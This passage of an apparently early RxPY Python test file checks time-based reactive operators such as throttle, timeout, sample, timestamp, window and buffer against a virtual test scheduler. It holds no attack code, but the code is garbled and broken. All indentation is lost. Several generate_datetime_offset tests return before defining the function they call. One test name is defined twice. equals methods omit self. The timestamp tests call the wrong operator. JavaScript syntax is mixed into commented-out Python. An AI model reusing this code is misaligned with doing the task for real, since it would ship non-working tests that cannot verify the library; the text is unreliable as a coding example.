ys = [scheduler.create_cold_observable(on_next(20, 42), on_next(25, 99)), scheduler.create_cold_observable(on_next(40, 42), on_next(45, 99)), scheduler.create_cold_observable(on_next(20, 42), on_next(25, 99)), scheduler.create_cold_observable(on_next(60, 42), on_next(65, 99)), scheduler.create_cold_observable(on_next(20, 42), on_next(25, 99))]
def create():
def selector(x):
return ys[x]
return xs.throttle_with_selector(selector)
results = scheduler.start(create)
results.messages.assert_equal(on_next(250 + 20, 0), on_next(310 + 20, 2), on_next(400 + 20, 4), on_completed(550))
xs.subscriptions.assert_equal(subscribe(200, 550))
ys[0].subscriptions.assert_equal(subscribe(250, 250 + 20))
ys[1].subscriptions.assert_equal(subscribe(280, 310))
ys[2].subscriptions.assert_equal(subscribe(310, 310 + 20))
ys[3].subscriptions.assert_equal(subscribe(350, 400))
ys[4].subscriptions.assert_equal(subscribe(400, 400 + 20))
def test_throttle_duration_early_completion():
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(on_next(150, -1), on_next(250, 0), on_next(280, 1), on_next(310, 2), on_next(350, 3), on_next(400, 4), on_completed(410))
ys = [scheduler.create_cold_observable(on_next(20, 42), on_next(25, 99)), scheduler.create_cold_observable(on_next(40, 42), on_next(45, 99)), scheduler.create_cold_observable(on_next(20, 42), on_next(25, 99)), scheduler.create_cold_observable(on_next(60, 42), on_next(65, 99)), scheduler.create_cold_observable(on_next(20, 42), on_next(25, 99))]
def create():
def selector(x):
return ys[x]
return xs.throttle_with_selector(selector)
results = scheduler.start(create)
results.messages.assert_equal(on_next(250 + 20, 0), on_next(310 + 20, 2), on_next(410, 4), on_completed(410))
xs.subscriptions.assert_equal(subscribe(200, 410))
ys[0].subscriptions.assert_equal(subscribe(250, 250 + 20))
ys[1].subscriptions.assert_equal(subscribe(280, 310))
ys[2].subscriptions.assert_equal(subscribe(310, 310 + 20))
ys[3].subscriptions.assert_equal(subscribe(350, 400))
ys[4].subscriptions.assert_equal(subscribe(400, 410))
def test_throttle_duration_inner_error():
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(on_next(150, 1), on_next(250, 2), on_next(350, 3), on_next(450, 4), on_completed(550))
ex = 'ex'
def create():
def selector(x):
if x < 4:
return scheduler.create_cold_observable(on_next(x * 10, "Ignore"), on_next(x * 10 + 5, "Aargh!"))
else:
return scheduler.create_cold_observable(on_error(x * 10, ex))
return xs.throttle_with_selector(selector)
results = scheduler.start(create)
results.messages.assert_equal(on_next(250 + 2 * 10, 2), on_next(350 + 3 * 10, 3), on_error(450 + 4 * 10, ex))
xs.subscriptions.assert_equal(subscribe(200, 490))
def test_throttle_duration_outer_error():
ex = 'ex'
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(on_next(150, 1), on_next(250, 2), on_next(350, 3), on_next(450, 4), on_error(460, ex))
def create():
def selector(x):
return scheduler.create_cold_observable(on_next(x * 10, "Ignore"), on_next(x * 10 + 5, "Aargh!"))
return xs.throttle_with_selector(selector)
results = scheduler.start(create)
results.messages.assert_equal(on_next(250 + 2 * 10, 2), on_next(350 + 3 * 10, 3), on_error(460, ex))
xs.subscriptions.assert_equal(subscribe(200, 460))
def test_throttle_duration_selector_throws():
ex = 'ex'
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(on_next(150, 1), on_next(250, 2), on_next(350, 3), on_next(450, 4), on_completed(550))
def create():
def selector(x):
if x < 4:
return scheduler.create_cold_observable(on_next(x * 10, "Ignore"), on_next(x * 10 + 5, "Aargh!"))
else:
_raise(ex)
return xs.throttle_with_selector(selector)
results = scheduler.start(create)
results.messages.assert_equal(on_next(250 + 2 * 10, 2), on_next(350 + 3 * 10, 3), on_error(450, ex))
xs.subscriptions.assert_equal(subscribe(200, 450))
def test_throttle_duration_inner_done_delay_behavior():
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(on_next(150, 1), on_next(250, 2), on_next(350, 3), on_next(450, 4), on_completed(550))
def create():
def selector(x):
return scheduler.create_cold_observable(on_completed(x * 10))
return xs.throttle_with_selector(selector)
results = scheduler.start(create)
results.messages.assert_equal(on_next(250 + 2 * 10, 2), on_next(350 + 3 * 10, 3), on_next(450 + 4 * 10, 4), on_completed(550))
xs.subscriptions.assert_equal(subscribe(200, 550))
def test_throttle_duration_inner_done_throttle_behavior():
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(on_next(150, 1), on_next(250, 2), on_next(280, 3), on_next(300, 4), on_next(400, 5), on_next(410, 6), on_completed(550))
def create():
def selector(x):
return scheduler.create_cold_observable(on_completed(x * 10))
return xs.throttle_with_selector(selector)
results = scheduler.start(create)
results.messages.assert_equal(on_next(250 + 2 * 10, 2), on_next(300 + 4 * 10, 4), on_next(410 + 6 * 10, 6), on_completed(550))
xs.subscriptions.assert_equal(subscribe(200, 550))
# def test_window_time_basic():
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_next(150, 1), on_next(210, 2), on_next(240, 3), on_next(270, 4), on_next(320, 5), on_next(360, 6), on_next(390, 7), on_next(410, 8), on_next(460, 9), on_next(470, 10), on_completed(490))
# def create():
# def selector(ys, i):
# def proj(y):
# return "%s %s" % (i, y)
# return ys.select(proj).concat(Observable.return_value('%s end' % i))
# return xs.window_with_time(100, scheduler=scheduler).select(selector).merge_observable()
# results = scheduler.start(create)
# results.messages.assert_equal(on_next(210, "0 2"), on_next(240, "0 3"), on_next(270, "0 4"), on_next(300, "0 end"), on_next(320, "1 5"), on_next(360, "1 6"), on_next(390, "1 7"), on_next(400, "1 end"), on_next(410, "2 8"), on_next(460, "2 9"), on_next(470, "2 10"), on_next(490, "2 end"), on_completed(490))
# xs.subscriptions.assert_equal(subscribe(200, 490))
# def test_Window_Time_Basic_Both():
# , xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_next(150, 1), on_next(210, 2), on_next(240, 3), on_next(270, 4), on_next(320, 5), on_next(360, 6), on_next(390, 7), on_next(410, 8), on_next(460, 9), on_next(470, 10), on_completed(490))
# results = scheduler.start(create)
# return xs.window_with_time(100, 50, scheduler).select(function (ys, i) {
# return ys.select(function (y) {
# return i + " " + y
# }).concat(Observable.returnValue(i + " end"))
# }).merge_observable()
# results.messages.assert_equal(on_next(210, "0 2"), on_next(240, "0 3"), on_next(270, "0 4"), on_next(270, "1 4"), on_next(300, "0 end"), on_next(320, "1 5"), on_next(320, "2 5"), on_next(350, "1 end"), on_next(360, "2 6"), on_next(360, "3 6"), on_next(390, "2 7"), on_next(390, "3 7"), on_next(400, "2 end"), on_next(410, "3 8"), on_next(410, "4 8"), on_next(450, "3 end"), on_next(460, "4 9"), on_next(460, "5 9"), on_next(470, "4 10"), on_next(470, "5 10"), on_next(490, "4 end"), on_next(490, "5 end"), on_completed(490))
# xs.subscriptions.assert_equal(subscribe(200, 490))
class TimeInterval(object):
def __init__(self, value, interval):
if isinstance(interval, timedelta):
interval = int(interval.microseconds/1000)
self.value = value
self.interval = interval
def __str__(self):
return "%s@%s" % (self.value, self.interval)
def equals(other):
return other.interval == self.interval and other.value == self.value
def test_time_interval_regular():
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(on_next(150, 1), on_next(210, 2), on_next(230, 3), on_next(260, 4), on_next(300, 5), on_next(350, 6), on_completed(400))
def create():
def selector(x):
return TimeInterval(x.value, x.interval)
return xs.time_interval(scheduler).select(selector).dump()
results = scheduler.start(create)
results.messages.assert_equal(on_next(210, TimeInterval(2, 10)), on_next(230, TimeInterval(3, 20)), on_next(260, TimeInterval(4, 30)), on_next(300, TimeInterval(5, 40)), on_next(350, TimeInterval(6, 50)), on_completed(400))
def test_time_interval_empty():
scheduler = TestScheduler()
def create():
return Observable.empty(scheduler).time_interval(scheduler)
results = scheduler.start(create)
results.messages.assert_equal(on_completed(201))
def test_time_interval_error():
ex = 'ex'
scheduler = TestScheduler()
def create():
return Observable.throw_exception(ex, scheduler).time_interval(scheduler)
results = scheduler.start(create)
results.messages.assert_equal(on_error(201, ex))
def test_time_interval_never():
scheduler = TestScheduler()
def create():
return Observable.never().time_interval(scheduler)
results = scheduler.start(create)
results.messages.assert_equal()
class Timestamp(object):
def __init__(self, value, timestamp):
if isinstance(timestamp, datetime):
timestamp = timestamp-datetime.fromtimestamp(0)
timestamp = int(timestamp.microseconds/1000)
self.value = value
self.timestamp = timestamp
def __str__(self):
return "%s@%s" % (self.value, self.timestamp)
def equals(other):
return other.timestamp == self.timestamp and other.value == self.value
def test_timestamp_regular():
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(on_next(150, 1), on_next(210, 2), on_next(230, 3), on_next(260, 4), on_next(300, 5), on_next(350, 6), on_completed(400))
def create():
def selector(x):
return Timestamp(x.value, x.timestamp)
return xs.timestamp(scheduler).select(selector)
results = scheduler.start(create)
results.messages.assert_equal(on_next(210, Timestamp(2, 210)), on_next(230, Timestamp(3, 230)), on_next(260, Timestamp(4, 260)), on_next(300, Timestamp(5, 300)), on_next(350, Timestamp(6, 350)), on_completed(400))
def test_timestamp_empty():
scheduler = TestScheduler()
def create():
return Observable.empty(scheduler).time_interval(scheduler=scheduler)
results = scheduler.start(create)
results.messages.assert_equal(on_completed(201))
def test_timestamp_error():
ex = 'ex'
scheduler = TestScheduler()
def create():
return Observable.throw_exception(ex, scheduler).time_interval(scheduler=scheduler)
results = scheduler.start(create)
results.messages.assert_equal(on_error(201, ex))
def test_timestamp_never():
scheduler = TestScheduler()
def create():
return Observable.never().time_interval(scheduler=scheduler)
results = scheduler.start(create)
results.messages.assert_equal()
def test_sample_regular():
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(on_next(150, 1), on_next(210, 2), on_next(230, 3), on_next(260, 4), on_next(300, 5), on_next(350, 6), on_next(380, 7), on_completed(390))
def create():
return xs.sample(50, scheduler=scheduler)
results = scheduler.start(create)
results.messages.assert_equal(on_next(250, 3), on_next(300, 5), on_next(350, 6), on_next(400, 7), on_completed(400))
def test_sample_error_in_flight():
ex = 'ex'
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(on_next(150, 1), on_next(210, 2), on_next(230, 3), on_next(260, 4), on_next(300, 5), on_next(310, 6), on_error(330, ex))
def create():
return xs.sample(50, scheduler=scheduler)
results = scheduler.start(create)
results.messages.assert_equal(on_next(250, 3), on_next(300, 5), on_error(330, ex))
def test_sample_empty():
scheduler = TestScheduler()
def create():
return Observable.empty(scheduler=scheduler).sample(0, scheduler=scheduler)
results = scheduler.start(create)
results.messages.assert_equal(on_completed(201))
def test_sample_error():
ex = 'ex'
scheduler = TestScheduler()
def create():
return Observable.throw_exception(ex, scheduler=scheduler).sample(0, scheduler=scheduler)
results = scheduler.start(create)
results.messages.assert_equal(on_error(201, ex))
def test_sample_never():
scheduler = TestScheduler()
def create():
return Observable.never().sample(0, scheduler=scheduler)
results = scheduler.start(create)
results.messages.assert_equal()
def test_timeout_in_time():
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(on_next(150, 1), on_next(210, 2), on_next(230, 3), on_next(260, 4), on_next(300, 5), on_next(350, 6), on_completed(400))
def create():
return xs.timeout(500, None, scheduler=scheduler)
results = scheduler.start(create)
results.messages.assert_equal(on_next(210, 2), on_next(230, 3), on_next(260, 4), on_next(300, 5), on_next(350, 6), on_completed(400))
def test_timeout_out_of_time():
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(on_next(150, 1), on_next(210, 2), on_next(230, 3), on_next(260, 4), on_next(300, 5), on_next(350, 6), on_completed(400))
def create():
return xs.timeout(205, scheduler=scheduler)
results = scheduler.start(create)
results.messages.assert_equal(on_next(210, 2), on_next(230, 3), on_next(260, 4), on_next(300, 5), on_next(350, 6), on_completed(400))
def test_timeout_timeout_occurs_1():
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(on_next(70, 1), on_next(130, 2), on_next(310, 3), on_next(400, 4), on_completed(500))
ys = scheduler.create_cold_observable(on_next(50, -1), on_next(200, -2), on_next(310, -3), on_completed(320))
def create():
return xs.timeout(100, ys, scheduler=scheduler)
results = scheduler.start(create)
results.messages.assert_equal(on_next(350, -1), on_next(500, -2), on_next(610, -3), on_completed(620))
xs.subscriptions.assert_equal(subscribe(200, 300))
ys.subscriptions.assert_equal(subscribe(300, 620))
def test_timeout_timeout_occurs_2():
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(on_next(70, 1), on_next(130, 2), on_next(240, 3), on_next(310, 4), on_next(430, 5), on_completed(500))
ys = scheduler.create_cold_observable(on_next(50, -1), on_next(200, -2), on_next(310, -3), on_completed(320))
def create():
return xs.timeout(100, ys, scheduler=scheduler)
results = scheduler.start(create)
results.messages.assert_equal(on_next(240, 3), on_next(310, 4), on_next(460, -1), on_next(610, -2), on_next(720, -3), on_completed(730))
xs.subscriptions.assert_equal(subscribe(200, 410))
ys.subscriptions.assert_equal(subscribe(410, 730))
def test_timeout_timeout_occurs_never():
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(on_next(70, 1), on_next(130, 2), on_next(240, 3), on_next(310, 4), on_next(430, 5), on_completed(500))
ys = scheduler.create_cold_observable()
def create():
return xs.timeout(100, ys, scheduler=scheduler)
results = scheduler.start(create)
results.messages.assert_equal(on_next(240, 3), on_next(310, 4))
xs.subscriptions.assert_equal(subscribe(200, 410))
ys.subscriptions.assert_equal(subscribe(410, 1000))
def test_timeout_timeout_occurs_completed():
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(on_completed(500))
ys = scheduler.create_cold_observable(on_next(100, -1))
def create():
return xs.timeout(100, ys, scheduler=scheduler)
results = scheduler.start(create)
results.messages.assert_equal(on_next(400, -1))
xs.subscriptions.assert_equal(subscribe(200, 300))
ys.subscriptions.assert_equal(subscribe(300, 1000))
def test_timeout_timeout_occurs_error():
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(on_error(500, 'ex'))
ys = scheduler.create_cold_observable(on_next(100, -1))
def create():
return xs.timeout(100, ys, scheduler=scheduler)
results = scheduler.start(create)
results.messages.assert_equal(on_next(400, -1))
xs.subscriptions.assert_equal(subscribe(200, 300))
ys.subscriptions.assert_equal(subscribe(300, 1000))
def test_timeout_timeout_not_occurs_completed():
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(on_completed(250))
ys = scheduler.create_cold_observable(on_next(100, -1))
def create():
return xs.timeout(100, ys, scheduler=scheduler)
results = scheduler.start(create)
results.messages.assert_equal(on_completed(250))
xs.subscriptions.assert_equal(subscribe(200, 250))
ys.subscriptions.assert_equal()
def test_timeout_timeout_not_occurs_error():
ex = 'ex'
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(on_error(250, ex))
ys = scheduler.create_cold_observable(on_next(100, -1))
def create():
return xs.timeout(100, ys, scheduler=scheduler)
results = scheduler.start(create)
results.messages.assert_equal(on_error(250, ex))
xs.subscriptions.assert_equal(subscribe(200, 250))
ys.subscriptions.assert_equal()
def test_timeout_timeout_does_not_occur():
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(on_next(70, 1), on_next(130, 2), on_next(240, 3), on_next(320, 4), on_next(410, 5), on_completed(500))
ys = scheduler.create_cold_observable(on_next(50, -1), on_next(200, -2), on_next(310, -3), on_completed(320))
def create():
return xs.timeout(100, ys, scheduler=scheduler)
results = scheduler.start(create)
results.messages.assert_equal(on_next(240, 3), on_next(320, 4), on_next(410, 5), on_completed(500))
xs.subscriptions.assert_equal(subscribe(200, 500))
ys.subscriptions.assert_equal()
def test_timeout_datetime_offset_timeout_occurs():
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(on_next(410, 1))
ys = scheduler.create_cold_observable(on_next(100, -1))
def create():
return xs.timeout(datetime.fromtimestamp(400/1000), ys, scheduler=scheduler)
results = scheduler.start(create)
results.messages.assert_equal(on_next(500, -1))
xs.subscriptions.assert_equal(subscribe(200, 400))
ys.subscriptions.assert_equal(subscribe(400, 1000))
def test_timeout_datetime_offset_timeout_does_not_occur_completed():
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(on_next(310, 1), on_completed(390))
ys = scheduler.create_cold_observable(on_next(100, -1))
def create():
return xs.timeout(datetime.fromtimestamp(400/1000), ys, scheduler=scheduler)
results = scheduler.start(create)
results.messages.assert_equal(on_next(310, 1), on_completed(390))
xs.subscriptions.assert_equal(subscribe(200, 390))
ys.subscriptions.assert_equal()
def test_timeout_datetime_offset_timeout_does_not_occur_error():
ex = 'ex'
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(on_next(310, 1), on_error(390, ex))
ys = scheduler.create_cold_observable(on_next(100, -1))
def create():
return xs.timeout(datetime.fromtimestamp(400/1000), ys, scheduler=scheduler)
results = scheduler.start(create)
results.messages.assert_equal(on_next(310, 1), on_error(390, ex))
xs.subscriptions.assert_equal(subscribe(200, 390))
ys.subscriptions.assert_equal()
def test_timeout_datetime_offset_timeout_occur_2():
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(on_next(310, 1), on_next(350, 2), on_next(420, 3), on_completed(450))
ys = scheduler.create_cold_observable(on_next(100, -1))
def create():
return xs.timeout(datetime.fromtimestamp(400/1000), ys, scheduler=scheduler)
results = scheduler.start(create)
results.messages.assert_equal(on_next(310, 1), on_next(350, 2), on_next(500, -1))
xs.subscriptions.assert_equal(subscribe(200, 400))
ys.subscriptions.assert_equal(subscribe(400, 1000))
def test_timeout_datetime_offset_timeout_occur_3():
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(on_next(310, 1), on_next(350, 2), on_next(420, 3), on_completed(450))
ys = scheduler.create_cold_observable()
def create():
return xs.timeout(datetime.fromtimestamp(400/1000), ys, scheduler)
results = scheduler.start(create)
results.messages.assert_equal(on_next(310, 1), on_next(350, 2))
xs.subscriptions.assert_equal(subscribe(200, 400))
ys.subscriptions.assert_equal(subscribe(400, 1000))
def test_timeout_duration_simple_never():
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(on_next(310, 1), on_next(350, 2), on_next(420, 3), on_completed(450))
ys = scheduler.create_cold_observable()
def create():
def selector(x):
return ys
return xs.timeout_with_selector(ys, selector)
results = scheduler.start(create)
results.messages.assert_equal(on_next(310, 1), on_next(350, 2), on_next(420, 3), on_completed(450))
xs.subscriptions.assert_equal(subscribe(200, 450))
ys.subscriptions.assert_equal(subscribe(200, 310), subscribe(310, 350), subscribe(350, 420), subscribe(420, 450))
def test_timeout_duration_simple_timeout_first():
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(on_next(310, 1), on_next(350, 2), on_next(420, 3), on_completed(450))
ys = scheduler.create_cold_observable(on_next(100, 'boo!'))
zs = scheduler.create_cold_observable()
def create():
return xs.timeout_with_selector(ys, lambda x: zs)
results = scheduler.start(create)
assert(len(results.messages) == 1)
assert(results.messages[0].time == 300 and results.messages[0].value.exception)
xs.subscriptions.assert_equal(subscribe(200, 300))
ys.subscriptions.assert_equal(subscribe(200, 300))
zs.subscriptions.assert_equal()
def test_timeout_duration_simple_timeout_later():
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(on_next(310, 1), on_next(350, 2), on_next(420, 3), on_completed(450))
ys = scheduler.create_cold_observable()
zs = scheduler.create_cold_observable(on_next(50, 'boo!'))
def create():
return xs.timeout_with_selector(ys, lambda _: zs)
results = scheduler.start(create)
assert(len(results.messages) == 3)
assert(on_next(310, 1).equals(results.messages[0]))
assert(on_next(350, 2).equals(results.messages[1]))
assert(results.messages[2].time == 400 and results.messages[2].value.exception)
xs.subscriptions.assert_equal(subscribe(200, 400))
ys.subscriptions.assert_equal(subscribe(200, 310))
zs.subscriptions.assert_equal(subscribe(310, 350), subscribe(350, 400))
def test_timeout_duration_simple_timeout_by_completion():
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(on_next(310, 1), on_next(350, 2), on_next(420, 3), on_completed(450))
ys = scheduler.create_cold_observable()
zs = scheduler.create_cold_observable(on_completed(50))
def create():
return xs.timeout_with_selector(ys, lambda _: zs)
results = scheduler.start(create)
assert(len(results.messages) == 3)
assert(on_next(310, 1).equals(results.messages[0]))
assert(on_next(350, 2).equals(results.messages[1]))
assert(results.messages[2].time == 400 and results.messages[2].value.exception)
xs.subscriptions.assert_equal(subscribe(200, 400))
ys.subscriptions.assert_equal(subscribe(200, 310))
zs.subscriptions.assert_equal(subscribe(310, 350), subscribe(350, 400))
def test_timeout_duration_simple_timeout_by_completion():
ex = 'ex'
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(on_next(310, 1), on_next(350, 2), on_next(420, 3), on_completed(450))
ys = scheduler.create_cold_observable()
zs = scheduler.create_cold_observable()
def create():
def selector(x):
if x < 3:
return zs
else:
_raise(ex)
return xs.timeout_with_selector(ys, selector)
results = scheduler.start(create)
results.messages.assert_equal(on_next(310, 1), on_next(350, 2), on_next(420, 3), on_error(420, ex))
xs.subscriptions.assert_equal(subscribe(200, 420))
ys.subscriptions.assert_equal(subscribe(200, 310))
zs.subscriptions.assert_equal(subscribe(310, 350), subscribe(350, 420))
def test_timeout_duration_simple_inner_throws():
ex = 'ex'
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(on_next(310, 1), on_next(350, 2), on_next(420, 3), on_completed(450))
ys = scheduler.create_cold_observable()
zs = scheduler.create_cold_observable(on_error(50, ex))
def create():
return xs.timeout_with_selector(ys, lambda _: zs)
results = scheduler.start(create)
results.messages.assert_equal(on_next(310, 1), on_next(350, 2), on_error(400, ex))
xs.subscriptions.assert_equal(subscribe(200, 400))
ys.subscriptions.assert_equal(subscribe(200, 310))
zs.subscriptions.assert_equal(subscribe(310, 350), subscribe(350, 400))
def test_timeout_duration_simple_first_throws():
ex = 'ex'
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(on_next(310, 1), on_next(350, 2), on_next(420, 3), on_completed(450))
ys = scheduler.create_cold_observable(on_error(50, ex))
zs = scheduler.create_cold_observable()
def create():
return xs.timeout_with_selector(ys, lambda _: zs)
results = scheduler.start(create)
results.messages.assert_equal(on_error(250, ex))
xs.subscriptions.assert_equal(subscribe(200, 250))
ys.subscriptions.assert_equal(subscribe(200, 250))
zs.subscriptions.assert_equal()
def test_timeout_duration_simple_source_throws():
ex = 'ex'
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(on_next(310, 1), on_next(350, 2), on_next(420, 3), on_error(450, ex))
ys = scheduler.create_cold_observable()
zs = scheduler.create_cold_observable()
def create():
return xs.timeout_with_selector(ys, lambda _: zs)
results = scheduler.start(create)
results.messages.assert_equal(on_next(310, 1), on_next(350, 2), on_next(420, 3), on_error(450, ex))
xs.subscriptions.assert_equal(subscribe(200, 450))
ys.subscriptions.assert_equal(subscribe(200, 310))
zs.subscriptions.assert_equal(subscribe(310, 350), subscribe(350, 420), subscribe(420, 450))
def test_generate_timespan_finite():
scheduler = TestScheduler()
def create():
return Observable.generate_with_relative_time(0,
lambda x: x <= 3,
lambda x: x + 1,
lambda x: x,
lambda x: x + 1,
scheduler=scheduler)
results = scheduler.start(create)
results.messages.assert_equal(on_next(202, 0), on_next(204, 1), on_next(207, 2), on_next(211, 3), on_completed(211))
def test_generate_timespan_throw_condition():
ex = 'ex'
scheduler = TestScheduler()
def create():
return Observable.generate_with_relative_time(0,
lambda x: _raise(ex),
lambda x: x + 1,
lambda x: x,
lambda x: x + 1,
scheduler=scheduler)
results = scheduler.start(create)
results.messages.assert_equal(on_error(201, ex))
def test_generate_timespan_throw_result_selector():
ex = 'ex'
scheduler = TestScheduler()
def create():
return Observable.generate_with_relative_time(0,
lambda x: True,
lambda x: x + 1,
lambda x: _raise(ex),
lambda x: x + 1,
scheduler=scheduler)
results = scheduler.start(create)
results.messages.assert_equal(on_error(201, ex))
def test_generate_timespan_throw_iterate():
ex = 'ex'
scheduler = TestScheduler()
def create():
return Observable.generate_with_relative_time(0,
lambda x: True,
lambda x: _raise(ex),
lambda x: x,
lambda x: x + 1,
scheduler=scheduler)
results = scheduler.start(create)
results.messages.assert_equal(on_next(202, 0), on_error(202, ex))
def test_generate_timespan_throw_timeselector():
ex = 'ex'
scheduler = TestScheduler()
def create():
return Observable.generate_with_relative_time(0,
lambda x: True,
lambda x: x + 1,
lambda x: x,
lambda x: _raise(ex),
scheduler=scheduler)
results = scheduler.start(create)
results.messages.assert_equal(on_error(201, ex))
def test_generate_timespan_Dispose():
scheduler = TestScheduler()
def create():
return Observable.generate_with_relative_time(0,
lambda x: True,
lambda x: x + 1,
lambda x: x,
lambda x: x + 1,
scheduler=scheduler)
results = scheduler.start(create, disposed=210)
results.messages.assert_equal(on_next(202, 0), on_next(204, 1), on_next(207, 2))
def test_generate_datetime_offset_finite():
scheduler = TestScheduler()
return Observable.generate_with_relative_time(0,
lambda x: True,
lambda x: x + 1,
lambda x: x,
lambda x: scheduler.now() + x + 1,
scheduler=scheduler)
results = scheduler.start(create)
results.messages.assert_equal(on_next(202, 0), on_next(204, 1), on_next(207, 2), on_next(211, 3), on_completed(211))
def test_generate_datetime_offset_throw_condition():
ex = 'ex'
scheduler = TestScheduler()
return Observable.generate_with_relative_time(0,
lambda x: _raise(ex),
lambda x: x + 1,
lambda x: x,
lambda x: scheduler.now() + x + 1,
scheduler=scheduler)
results = scheduler.start(create)
results.messages.assert_equal(on_error(201, ex))
def test_generate_datetime_offset_throw_result_selector():
ex = 'ex'
scheduler = TestScheduler()
return Observable.generate_with_relative_time(0,
lambda x: True,
lambda x: x + 1,
lambda x: _raise(ex),
lambda x: scheduler.now() + x + 1,
scheduler=scheduler)
results = scheduler.start(create)
results.messages.assert_equal(on_error(201, ex))
def test_generate_datetime_offset_throw_iterate():
ex = 'ex'
scheduler = TestScheduler()
return Observable.generate_with_relative_time(0,
lambda x: True,
lambda x: _raise(ex),
lambda x: x,
lambda x: scheduler.now() + x + 1,
scheduler=scheduler)
results = scheduler.start(create)
results.messages.assert_equal(on_next(202, 0), on_error(202, ex))
def test_generate_datetime_offset_throw_time_selector():
ex = 'ex'
scheduler = TestScheduler()
return Observable.generate_with_relative_time(0,
lambda x: True,
lambda x: x + 1,
lambda x: x,
lambda x: _raise(ex),
scheduler=scheduler)
results.messages.assert_equal(on_error(201, ex))
def test_generate_datetime_offset_dispose():
scheduler = TestScheduler()
return Observable.generate_with_relative_time(0,
lambda x: True,
lambda x: x + 1,
lambda x: x,
lambda x: scheduler.now() + x + 1,
scheduler=scheduler)
results = scheduler.start(create, disposed=210)
results.messages.assert_equal(on_next(202, 0), on_next(204, 1), on_next(207, 2))
def test_window_with_time_basic():
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(on_next(100, 1), on_next(210, 2), on_next(240, 3), on_next(280, 4), on_next(320, 5), on_next(350, 6), on_next(380, 7), on_next(420, 8), on_next(470, 9), on_completed(600))
def create():
def selector(w, i):
return w.select(lambda x: "%s %s" % (i, x))
return xs.window_with_time(100, 70, scheduler=scheduler).select(selector).merge_observable()
results = scheduler.start(create)
results.messages.assert_equal(on_next(210, "0 2"), on_next(240, "0 3"), on_next(280, "0 4"), on_next(280, "1 4"), on_next(320, "1 5"), on_next(350, "1 6"), on_next(350, "2 6"), on_next(380, "2 7"), on_next(420, "2 8"), on_next(420, "3 8"), on_next(470, "3 9"), on_completed(600))
xs.subscriptions.assert_equal(subscribe(200, 600))
def test_window_with_time_error():
ex = 'ex'
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(on_next(100, 1), on_next(210, 2), on_next(240, 3), on_next(280, 4), on_next(320, 5), on_next(350, 6), on_next(380, 7), on_next(420, 8), on_next(470, 9), on_error(600, ex))
def create():
def selector(w, i):
return w.select(lambda x: "%s %s" % (i, x))
return xs.window_with_time(100, 70, scheduler=scheduler).select(selector).merge_observable()
results = scheduler.start(create)
results.messages.assert_equal(on_next(210, "0 2"), on_next(240, "0 3"), on_next(280, "0 4"), on_next(280, "1 4"), on_next(320, "1 5"), on_next(350, "1 6"), on_next(350, "2 6"), on_next(380, "2 7"), on_next(420, "2 8"), on_next(420, "3 8"), on_next(470, "3 9"), on_error(600, ex))
xs.subscriptions.assert_equal(subscribe(200, 600))
def test_Window_with_time_disposed():
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(on_next(100, 1), on_next(210, 2), on_next(240, 3), on_next(280, 4), on_next(320, 5), on_next(350, 6), on_next(380, 7), on_next(420, 8), on_next(470, 9), on_completed(600))
def create():
def selector(w, i):
return w.select(lambda x: "%s %s" % (i, x))
return xs.window_with_time(100, 70, scheduler=scheduler).select(selector).merge_observable()
results = scheduler.start(create, disposed=370)
results.messages.assert_equal(on_next(210, "0 2"), on_next(240, "0 3"), on_next(280, "0 4"), on_next(280, "1 4"), on_next(320, "1 5"), on_next(350, "1 6"), on_next(350, "2 6"))
xs.subscriptions.assert_equal(subscribe(200, 370))
def test_window_with_time_basic_same():
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(on_next(100, 1), on_next(210, 2), on_next(240, 3), on_next(280, 4), on_next(320, 5), on_next(350, 6), on_next(380, 7), on_next(420, 8), on_next(470, 9), on_completed(600))
def create():
def selector(w, i):
return w.select(lambda x: "%s %s" % (i, x))
return xs.window_with_time(100, scheduler=scheduler).select(selector).merge_observable()
results = scheduler.start(create)
results.messages.assert_equal(on_next(210, "0 2"), on_next(240, "0 3"), on_next(280, "0 4"), on_next(320, "1 5"), on_next(350, "1 6"), on_next(380, "1 7"), on_next(420, "2 8"), on_next(470, "2 9"), on_completed(600))
xs.subscriptions.assert_equal(subscribe(200, 600))
def test_buffer_with_time_basic():
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(on_next(100, 1), on_next(210, 2), on_next(240, 3), on_next(280, 4), on_next(320, 5), on_next(350, 6), on_next(380, 7), on_next(420, 8), on_next(470, 9), on_completed(600))
def create():
return xs.buffer_with_time(100, 70, scheduler=scheduler).select(lambda x: ",".join([str(a) for a in x]))
results = scheduler.start(create)
